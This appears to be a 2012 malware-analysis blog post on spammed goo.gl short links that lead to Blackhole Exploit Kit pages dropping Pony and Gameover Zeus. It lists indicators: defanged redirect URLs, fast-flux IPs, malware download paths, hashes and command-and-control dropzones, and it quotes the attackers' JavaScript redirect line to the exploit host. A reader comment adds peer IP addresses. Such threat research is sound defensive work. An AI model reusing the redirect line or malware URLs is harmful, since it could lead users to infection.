Spammed Goo.gl Links – Part 3

Today we encountered interesting hostile links masked via Google’s link shortening service goo.gl. The samples we found included the following shortened links redirecting to Black Hole Exploit kits before dropping Gameover Zeus.
The screenshots below show us the geographic breakdown of victims that clicked on each of those shortened links.

URL: hxxp://goo[.]gl /hvQjQ
Original URL: hxxp://9el34ccw.physiorepeat[.]ru /index.html
hvQjQ

URL: hxxp://goo[.]gl /157Qy
Original URL: hxxp://v8ut.physiorepeat[.]ru /index.html

157Qy

URL: hxxp://goo[.]gl /WR9Gg
Original URL: hxxp://zgj.physiorepeat[.]ru /index.html

URL: hxxp://goo[.]gl /meCTY
Original URL: hxxp://3n8261.physiorepeat[.]ru /index.html

URL: hxxp://goo[.]gl /6HfNr
Original URL: hxxp://3n8261.physiorepeat[.]ru /index.html

URL: hxxp://goo[.]gl /6Owra
Original URL: hxxp://3n8261.physiorepeat[.]ru /index.html

URL: hxxp://goo[.]gl /y4h4n
Original URL: hxxp://3n8261.physiorepeat[.]ru /index.html

URL: hxxp://goo[.]gl /hgE4I
Original URL: hxxp://3n8261.physiorepeat[.]ru /index.html

URL: hxxp://goo[.]gl /BSNL9
Original URL: hxxp://3n8261.physiorepeat[.]ru /index.html

URL: hxxp://goo[.]gl /cExU2
Original URL: hxxp://wpwoxse0.kickedmember[.]ru /index.html


URL: hxxp://goo[.]gl /LVIfU
Original URL:hxxp://xc8vrqg.bromleyclergy[.]ru /index.html

URL: hxxp://goo[.]gl /LrfrJ
Original URL: hxxp://7lox0.kubicabridges[.]ru /index.html

These statistics show that each individual spam message did not appear to be sent to a large audience. On average each spam message only victimized an average of 15-20 users.

It is particularly interested not only to able to study the geographic distribution of victims, but because they were related to the ongoing Gameover Zeus distribution campaign that we have been continuously reporting here.

Each of these shortened links redirected victims to Blackhole Exploit kits hosted on 9 different subdomains at physiorepeat[.]ru, 1 at kubicabridges[.]ru and 1 at bromleyclergy[.]ru and 1 at kickedmember[.]ru.

These domains are hosted at the following IP addresses on a fast flux infrastructure that sets A records to a TTL of 20 seconds:

87.247.43.96
92.47.86.48
92.126.240.211
94.21.105.45
95.59.14.58
95.59.180.59
95.78.134.184
95.190.123.232
95.191.33.20

These javascript redirectors contain the following document.location script that send victims to a Blackhole Exploit kit at 64.150.166.199:

document.location=’hxxp://64.150.166.199/showthread.php?t=72d268be707a5fb7′;

It first downloaded Pony downloader from the following location:

64.150.166.199 /q.php?f=cec72&e=2

File: contacts.exe
MD5:8e4094a1438ab280df2e0796a705e52a
Size: 95,864 bytes

The pony downloader posts to its dropzone at 173.246.39.218 /pony/gate.php.
This pony downloader variant was also configured to download Gameover Zeus binaries from the following locations:

swanhillproperties[.]com /d7oBRwFA/2UDwW06.exe
ftp.filmsan.com[.]tr /qX9h9SCd/4CZNXUJh.exe

File: 2UDwW06.exe
MD5: 4bf9cca55ff576e91c1fd4a2c2d35ff1
Size: 2,78,528 bytes
Timestamp: 2012:03:05 19:31:42+01:00
Other: This file is digitally signed by ‘Ru3Ue4SyIDSA’
Company Name: 2q3wet Corporation
File Description: Windows TaskManager
Internal Name: taskmgr
Legal Copyright: Copyright (C) 2q3wet Corp. 1991-1999
Original Filename: taskmgr.exe

This Gameover variant is detected by 4 of 43 AV vendors on VirusTotal. The Gameover Zeus variant posts to a dropzone at 69.10.118.248:15539 /index.php. It had CID of “3004”.

Advertisements

One Comment

  1. Posted March 9, 2012 at 9:31 pm | Permalink | Reply

    Saw similar traffic today md5 84190b13919708320b6773fcd9d916d2 for game over is different and saw traffic via UDP to the following IP addresses

    24.176.16.81:24144
    178.19.25.92:25939
    114.148.255.187:25178
    70.184.221.22:25229
    74.140.168.196:16814
    89.45.103.26:14406
    86.123.195.34:27367
    178.54.12.177:18367
    99.90.38.37:17195
    65.189.51.255:19297
    76.178.80.190:20276
    79.4.241.217:29455
    184.226.209.60:13724
    111.253.191.237:19733
    94.62.27.189:28510

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: